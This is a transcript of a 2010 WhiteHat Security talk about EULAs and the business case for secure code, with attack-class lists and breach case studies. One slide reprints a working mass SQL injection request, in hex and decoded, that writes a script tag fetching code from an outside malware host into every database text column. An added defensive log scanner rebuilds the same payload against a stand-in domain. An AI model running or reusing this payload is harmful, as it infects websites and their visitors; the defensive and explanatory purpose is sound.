State of the EULA -- "Who pays for Secure Code?"


What are the business and societal implications of requiring secure coding practices to be implemented in the software industry? Would it affect you or your organization? How would it change the landscape of our industry, our legal system, and our wallets? Why don't developers write it now?

How did the system get the way it did and how will it change in the future? In this talk, we strive to come up with the answers. Bring your best ideas. Let's talk.

Nick Schilbe, WhiteHat Security

Nick Schilbe is a Security Engineering Supervisor at WhiteHat Security, leading a team of security engineers who manage WhiteHat Sentinel, the company’s SaaS-based website vulnerability management service. Mr. Schilbe develops, refines and implements new processes and workflows for the WhiteHat Sentinel family of website risk management solutions. His WhiteHat Security Engineering team provides service to more than 500 production e-commerce, financial services and healthcare websites, including many Fortune 500 companies.

State of the EULA -- "Who pays for Secure Code?" Document Transcript

  • 1. State of the EULA Who pays for Secure Code? Joshua Marpet Security Solutions Specialist 5.1.2010 © 2010 WhiteHat, Inc. Wednesday, May 12, 2010
  • 2. Definitions
        Secure Software:
        • software that is written so as to preclude the possibility of syntactical or technical attacks
        • software written using a secure framework
        • software executed behind a secure framework appliance
        EULA - End User License Agreement:
        • A software license agreement is a contract between the "licensor" and purchaser of the right to use software. The license may define ways under which the copy can be used, in addition to the automatic rights of the buyer including the first sale doctrine and 17 U.S.C. § 117 (freedom to use, archive, re-sale, and backup).
        • Many form contracts are only contained in digital form, and only presented to a user as a click-through where the user must "accept". As the user may not see the agreement until after he or she has already purchased the software, these documents may be contracts of adhesion. These documents often call themselves end-user license agreements (EULAs).
        Reason for EULAs: because they can; to hold harmless; to circumvent copyright law (to extend copyright where it is prohibited).
  • 3. Anti-Terrorism EULA: "You agree ... development, design ... production of missiles, or nuclear, chemical or biological weapons." iTunes? Nukes? Srsly?
  • 5. “Do not taunt happy fun ball” Srsly??
  • 7. SDLC - Software Development Life Cycle. Do you see the word Security? Why do we need EULA’s? Because of the SDLC.
  • 11. Implicit Security. How is this different from, say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs?
        Driver: licensing; insurance; laws; police to ensure laws are followed; road engineering to make it harder to get in wrecks.
        Manufacturer: IF the auto is found to be defective, LARGE liability (Firestone tires; Toyota gas pedal/carpet/computer/whatever!); NHTSA crash ratings; huge insurance policies to offset.
  • 15. Software security is explicit: it must be specified by the person or company commissioning the software. Automobile security is IMPLICIT: built into the automobile design process, mandated by various regulatory agencies, and incentivized by insurance companies who DON'T want to pay out on huge claims from owners and manufacturers alike.
  • 16. Explicit Results
        Consumer: the software they bought is not built implicitly secure. They must keep track of security patches for the software they own, and purchase 3rd-party means to protect the computer from malicious internet-based software: random worms, trojans, viruses, etc.
        Companies: if the software is used in production environments, they take on the liability.
  • 17. Secure Code = ? Why is secure code explicit? Money. Developers receive no extra money to write secure code. As a matter of fact, they are actually penalized: development teams are on deadlines for functional code, not secure functional code. Taking the time to write secure code takes away from the time needed to get the functionality, user interface (UI), documentation, etc. done.
  • 18. Dev Team Ramifications. What would happen to individual developers, or small dev teams, if security was IMPLICIT? The days of agile development, and small teams coming up with widgets or "apps", would be over. The equivalent of malpractice insurance would simply be setting the bar too high for individuals or small teams to get over, much as it is in the auto or plane industry today. (Mind you, I'm not suggesting we should change the auto or plane industry, just making a comparison.)
  • 19. Open Source? What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or experimental planes are in, or hot rods in the car industry. So long as it meets some reasonable definition of safety, you can get insurance. That insurance will have very much smaller claim limits, and it will cover a lot fewer categories of problems, but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with open source software, you save on up-front costs, but you have explicitly made a choice to have software without implicit support.
  • 22. Marketability. There's also the marketability of developer skills. As a developer, would you rather have Java, .NET, and C# on your resume, or MyKonos, which, although good, no one has heard of?
  • 23. Secure Code = ? Extra Testing! So what would happen if we got rid of the EULA? If it was decreed that code HAS to be secure, out of the gate? We would quickly have problems finding developers who know how to code securely. But that can be fixed via using secure frameworks, secure code appliances, and/or a heck of a lot of developer education. Once that problem was solved, the cost of software would rise dramatically. Testing would become an onerous burden on dev teams, as every revision of code would require full rounds of QA, regression testing, unit testing, etc. This is besides the extra time (read: money) it would take to write the initial code as secure.
  • 25. Secure Framework - MyKonos. Example of a secure framework and a secure code appliance (similar to a WAF, but not as widely known).
  • 26. Top Ten Web Hacking Techniques (2009). MUST be able to protect against: a HOSTILE WEB USER; a HOSTILE WEB PAGE.
  • 27. Website Classes of Attacks
        Technical: Automation Can Identify
        Command Execution
        • Buffer Overflow
        • Format String Attack
        • LDAP Injection
        • OS Commanding
        • SQL Injection
        • SSI Injection
        • XPath Injection
        Information Disclosure
        • Directory Indexing
        • Information Leakage
        • Path Traversal
        • Predictable Resource Location
        Client-Side
        • Content Spoofing
        • Cross-site Scripting
        • HTTP Response Splitting*
        Business Logic: Humans Required
        Authentication
        • Brute Force
        • Insufficient Authentication
        • Weak Password Recovery Validation
        • CSRF*
        Authorization
        • Credential/Session Prediction
        • Insufficient Authorization
        • Insufficient Session Expiration
        • Session Fixation
        Logical Attacks
        • Abuse of Functionality
        • Denial of Service
        • Insufficient Anti-automation
        • Insufficient Process Validation
  • 32. http://blogs.apache.org/infra/entry/apache_org_04_09_2010
  • 33. Mass SQL Injection (random, opportunistic)
        • Generic SQL injection populates databases with malicious JavaScript IFRAMEs (millions of websites infected - more every day)
        • Visitors arrive and their browser auto-connects to a malware server, infecting their machine with trojans -- or the website is damaged and can no longer conduct business
        • Botnets form, then continue SQL-injecting websites
        • Infected sites risk becoming blacklisted on search engines and web filtering gateways, causing loss of visitors
  • 34. The request as it appears in the web server log:
        "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast (0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5 220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973 6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6 22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39 39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206 22E78747970653D31363729204F50454E205461626C655F437572736F722046455443 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4 043205748494C4528404046455443485F5354415455533D302920424547494E206578 65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2 72B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874 74703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736 3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520 272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F736 46F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C 212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F 72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000)); EXEC(@S); HTTP/1.1" 200 6338 "-"
        Decoded:
        DECLARE @T varchar(255),@C varchar(4000)
        DECLARE Table_Cursor CURSOR FOR
            select a.name,b.name from sysobjects a,syscolumns b
            where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
        OPEN Table_Cursor
        FETCH NEXT FROM Table_Cursor INTO @T,@C
        WHILE(@@FETCH_STATUS=0)
        BEGIN
            exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')
            FETCH NEXT FROM Table_Cursor INTO @T,@C
        END
        CLOSE Table_Cursor
        DEALLOCATE Table_Cursor
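A log scanner for the request pattern shown on the slide, added here as an example and not part of the original deck: it URL-decodes each request, pulls the T-SQL out of the CAST(0x...) hex literal, and reports the injected script URLs. The access-log lines, IP addresses and the payload domain (malware.example) are constructed for the demo.

```python
"""Flag hex-encoded mass SQL injection attempts in web access logs.

Added example, not from the original slides: the slide's request hides its
T-SQL inside CAST(0x...), so a log search for "update" or "<script" sees
only hex. Log lines and payload below are constructed for the demo.
"""
import re
from urllib.parse import unquote

# The "SET @S=CAST(0x<hex> AS CHAR(n)); EXEC(@S)" idiom; the hex may contain
# whitespace when the log line has been wrapped.
HEX_CAST_RE = re.compile(
    r"cast\s*\(\s*0x([0-9a-f\s]+?)\s+as\s+n?(?:var)?char", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']?([^\"'>\s]+)", re.IGNORECASE)
# Common Log Format prefix: client, identity, user, [time], "METHOD path proto"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3})')
SQL_INDICATORS = ("sysobjects", "syscolumns", "cursor", "exec(", "update ")

def decode_hex_literal(hexdigits):
    """Decode a SQL hex literal to text; return None if it is not valid hex."""
    clean = re.sub(r"\s+", "", hexdigits)
    if not clean or len(clean) % 2:
        return None
    try:
        raw = bytes.fromhex(clean)
    except ValueError:
        return None
    # Payloads of this family are plain ASCII T-SQL; latin-1 never fails.
    return raw.decode("latin-1")

def analyse_request(path):
    """Return details of an injection attempt in the request path, or None."""
    match = HEX_CAST_RE.search(unquote(path))
    if not match:
        return None
    sql = decode_hex_literal(match.group(1))
    if sql is None:
        return None
    lower = sql.lower()
    return {
        "decoded_sql": sql,
        "indicators": [k for k in SQL_INDICATORS if k in lower],
        "script_urls": SCRIPT_SRC_RE.findall(sql),
    }

def scan_log(lines):
    """Run analyse_request over access-log lines; return a list of findings."""
    findings = []
    for line in lines:
        parsed = LOG_RE.match(line)
        if not parsed:
            continue
        hit = analyse_request(parsed.group("path"))
        if hit:
            hit.update(ip=parsed.group("ip"), status=parsed.group("status"))
            findings.append(hit)
    return findings

# --- constructed sample data (same shape as the request in the slide) -------
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+"
    "''\"></title><script src=\"http://malware.example/w.js\"></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor")
ATTACK_PATH = ("/?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast(0x"
               + INJECTED_SQL.encode("latin-1").hex().upper()
               + "%20AS%20CHAR(4000));EXEC(@S);")
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2010:10:00:01 +0000] "GET /products?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/May/2010:10:00:02 +0000] "GET ' + ATTACK_PATH + ' HTTP/1.1" 200 6338',
]
```

Run `scan_log(SAMPLE_LOG)` to get one finding carrying the client IP, the decoded T-SQL, the matched indicators and the script URL the payload would have written into every text column.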
  • 35. Fully Targeted
        Hacker 1: Albert "Segvec" Gonzalez. Hacker 2.
        Victims: TJ Maxx, Barnes & Noble, BJ’s Wholesale, Boston Market, DSW Shoe Warehouse, Forever 21, Office Max, Sports Authority, Heartland Payment Systems, Hannaford Brothers, 7-Eleven, Dave and Busters
        Techniques: SQL Injection, Sniffers, Wireless Security / War Driving, Shared Passwords, Malware, Anti-Forensics, Backdoors, Social Engineering
        http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/
        http://government.zdnet.com/?p=5242
        http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech
  • 36. Twitter Hacker
        1. Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email goes to the secondary account: ******@h******.com.
        2. Guesses the secondary Hotmail account; it is deactivated, but he is able to re-register it. Resends the reset email and bingo.
        3. Pilfers the inbox for passwords to other web services; sets the Gmail password back to the original so the employee would not notice.
        4. Uses the same password to compromise the employee's email on Google Apps, steal hundreds of internal documents, and access Twitter's domains at GoDaddy. Owned! Sent to TechCrunch.
        5. Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using usernames/passwords and password recovery systems.
        “I’m sorry” - Hacker Croll
        http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/
  • 43. Business Goals & Budget Justification
        Risk Mitigation: "If we spend $X on Y, we’ll reduce risk of loss of $A by B%."
        Due Diligence: "We must spend $X on Y because it’s an industry best-practice."
        Incident Response: "We must spend $X on Y so that Z never happens again."
        Regulatory Compliance: "We must spend $X on Y because <insert regulation> says so."
        Competitive Advantage: "We must spend $X on Y to make the customer happy."
  • 44. WhiteHat Security Top Ten: percentage likelihood of a website having a vulnerability, by class
        Cross-Site Scripting            65%
        Information Leakage             47%
        Content Spoofing                30%
        Insufficient Authorization      18%
        SQL Injection                   17%
        Predictable Resource Location   14%
        Session Fixation, Cross-Site Request Forgery, Insufficient Authentication, HTTP Response Splitting: 9-11% each (the chart shows 9%, 11%, 11% and 10% for these four)
  • 45. Time-to-Fix (Days)
        Cross-Site Scripting             58
        Information Leakage              85
        Content Spoofing                 71
        Insufficient Authorization       72
        SQL Injection                    38
        Predictable Resource Location    79
        Session Fixation                104
        Cross-Site Request Forgery       56
        Insufficient Authentication     125
        HTTP Response Splitting          80
        Best-case scenario: not all vulnerabilities have been fixed...
  • 46. Resolution Rate - By Class
        Class of Attack                 % resolved   Severity
        Cross Site Scripting            20%          urgent
        Insufficient Authorization      19%          urgent
        SQL Injection                   30%          urgent
        HTTP Response Splitting         75%          urgent
        Directory Traversal             53%          urgent
        Insufficient Authentication     38%          critical
        Cross-Site Scripting            39%          critical
        Abuse of Functionality          28%          critical
        Cross-Site Request Forgery      45%          critical
        Session Fixation                21%          critical
        Brute Force                     11%          high
        Content Spoofing                25%          high
        HTTP Response Splitting         30%          high
        Information Leakage             29%          high
        Predictable Resource Location   26%          high
  • 48. How the breach was detected:
        • 3rd party detection due to FRAUD (55%)
        • 3rd party detection NOT due to fraud (15%)
        • Employee discovery (13%)
        • Unusual system performance (11%)
        http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/
  • 49. http://www.zdnet.com.au/mcafee-clients-do-you-have-the-guts-339302660.htm?omnRef=http%3A%2F%2Fwww.zdnet.com.au%2Fmcafee-clients-do-you-have-the-guts-339302660.htm
        So which would you rather have? Software with implicit security, and the corresponding high bar to entry, with mal-dev insurance policies and government agencies mandating security practices? Or software without implicit security, and the EULA of the Damned?
  • 50. References/Organizations
        OWASP - Open Web Application Security Project, http://www.owasp.org
        • WebGoat - VMs with vulns to hack
        • WebScarab - proxy to see how hackers work
        • Multiple other projects!
        • Join! It’s free!
        WASC - Web Application Security Consortium, http://www.webappsec.org
        • TC v2 - http://projects.webappsec.org/Threat-Classification
  • 51. Thank You! Joshua Marpet Security Solutions Specialist Joshua.Marpet@whitehatsec.com Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ WhiteHat Security http://www.whitehatsec.com/ © 2010 WhiteHat, Inc. Wednesday, May 12, 2010